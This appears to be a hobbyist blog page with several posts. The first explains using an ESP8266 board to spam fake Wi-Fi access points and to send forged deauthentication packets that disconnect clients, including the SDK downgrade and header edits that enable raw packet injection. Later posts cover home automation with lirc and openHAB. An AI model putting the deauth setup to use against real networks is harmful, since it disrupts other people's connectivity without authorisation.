Hacking with ESP8266

I wasn't too active here in the last year, and the main reason is that I started a master in IT Security, and my projects became less electronics oriented. But now I had some time to play with my ESP8266 modules and try out some hacking with them. The module I'm using is named "NodeMcu Lua WIFI Internet Things development board based ESP8266 CP2102 module" on ebay and costs $5. I really like it, because it can be programmed with a normal USB cable, and it has all the connections easily accessible:

Creating a lot of fake access points

Technically it does not create any access points, but if you list the available access points with your phone or computer you will see a really a lot of them all with a random name and no encryption. The ESP8266 does it with sending beacon frames, similarly to the ones routers are using to advertise their wifi network. The original blogpost I was using is here: http://ruralhacker.blogspot.it/2016/01/esp8266-jamming.html and the code is here: https://github.com/kripthor/WiFiBeaconJam It was working for me flawlessly.

Disconnecting everyone from the wifi

There is a known attack against wifi networks: it is pretty easy to forge a deauth packet in the name of the access point and send it to the clients, and they will drop the connection (and usually try to reconnect). I was using this code from github: https://github.com/RandDruid/esp8266-deauth but it took me a while to make it work.
The problem is, that the developers of ESP8266 do not really want us to send these type of packages with the module. They (accidentally) added the functionality in SDK v1.3.0 but they removed it in v1.5.0. So we have to use v1.3.0. To do this with the Arduino IDE I did the followings:

• I used a freshly downloaded Arduino 1.6.5
• Then I added the staging version of esp8266 to Board Manager (more info: https://github.com/esp8266/Arduino)
• I installed the ESP8266 boards version 2.1.0-rc2 from the Board Manager. The version is really important, because they use the SDK v1.3.0.
• Then I edited the user-interface.h, because although the functionality is presented in the binaries of the SDK, it is not included in the header files. The user-interface.h was under ~/.arduino15/packages/esp8266/hardware/esp8266/2.0.0-rc2/tools/sdk/include/user_interface.h (I'm using Ubuntu).
  I simply added the following lines to the end of the file (before the #endif):
  typedef void (*freedom_outside_cb_t)(uint8 status);
  int wifi_register_send_pkt_freedom_cb(freedom_outside_cb_t cb);
  void wifi_unregister_send_pkt_freedom_cb(void);
  int wifi_send_pkt_freedom(uint8 *buf, int len, bool sys_seq);

Thereafter the code from github compiled fine, and it is working now. If it finds an access point and a client it notes it, and then it sends the deauth package to that specific host.
I have also tried to run the improved version using 2 ESP8266 module (https://github.com/RandDruid/esp8266-deauth2), but I couldn't make it work so far.

Setting up a random Chinese RGB led strip with Raspberry Pi using lirc

So I have ordered one of these RGB led strips from aliexpress:

It has an IR remote, but I wanted to integrate it into my home automation project. And so far it is going good.

First I installed lirc (Linux Infrared Remote Control) with using this tutorial: http://alexba.in/blog/2013/01/06/setting-up-lirc-on-the-raspberrypi/ I also had to update my firmware using this method: http://alexba.in/blog/2013/01/04/raspberrypi-quickstart/

The irrecord recorded the codes of the remote nicely, and now I can control it from command line.

I also installed lirc_web from here: https://github.com/alexbain/lirc_web I had some problems making it start automatically during boot (I was using this tutorial: http://alexba.in/blog/2013/11/02/lirc-web-nginx-and-upstart/). I had to change the line " exec /usr/local/bin/node /home/pi/lirc_web/app.js 2>&1 >> /var/log/open-source-universal-remote.upstart.log" to "exec /usr/bin/node /usr/local/lib/node_modules/lirc_web/app.js 2>&1 >> /var/log/open-source-universal-remote.upstart.log". Both the node folder and the app.js is in a different place.

Openhab

It wasn't running for me first, because some of its file was owned by root, and also the service has to be started by the openhab user. So here are the commands to solve this issue:
cd /etc/openhab (or where you installed it)
sudo chown -R openhab:openhab .
sudo su openhab -c 'service openhab start'